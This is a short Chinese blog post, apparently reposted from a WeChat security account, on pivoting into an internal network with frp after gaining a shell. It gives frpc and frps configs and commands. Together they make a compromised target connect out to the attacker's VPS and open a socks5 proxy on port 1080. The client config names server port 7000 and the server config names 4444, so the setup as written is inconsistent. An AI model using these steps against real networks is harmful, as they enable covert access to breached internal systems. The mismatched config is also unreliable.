内网渗透之流量代理(frp)

admin 2022年11月1日07:59:49评论659 views字数 540阅读1分48秒阅读模式

通常我们拿到shell之后扫内网之后,要进行目标机器的服务进行访问 的,这就需要把内网的流量代理到外网出来,也就是常说的内网穿透

2.概况

内网渗透之流量代理(frp)

上传 目标机 frpc.exe 、frpc.ini

内网渗透之流量代理(frp)

修改目标机frpc.ini 内容

[common]server_addr = vps_ip #自己填攻击机的ipserver_port = 7000
# 客户端认证 token,需要和服务端 token 保持一致token = frp1234
# 启用加密,防止流量被拦截use_encryption = true# 启用压缩,提升流量转发速度use_compression = true
[socks5]type = tcp# 连接 vps 的端口remote_port = 1080plugin = socks5

内网渗透之流量代理(frp)

目标机启动服务 

frpc.exe -c frpc.ini

内网渗透之流量代理(frp)

攻击机配置:

[common]server_addr = vps_ipserver_port = 4444
# 客户端认证 token,需要和服务端 token 保持一致token = frp1234

内网渗透之流量代理(frp)

攻击机开启服务 :

./frps -c frps.ini

内网渗透之流量代理(frp)

内网渗透之流量代理(frp)

注:代理服务器为vps的ip  端口为目标机器的socks代理端口也就是1080

内网渗透之流量代理(frp)


原文始发于微信公众号(韭要学JAVA安全):内网渗透之流量代理(frp)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月1日07:59:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网渗透之流量代理(frp)https://cn-sec.com/archives/1383732.html

发表评论

匿名网友 填写信息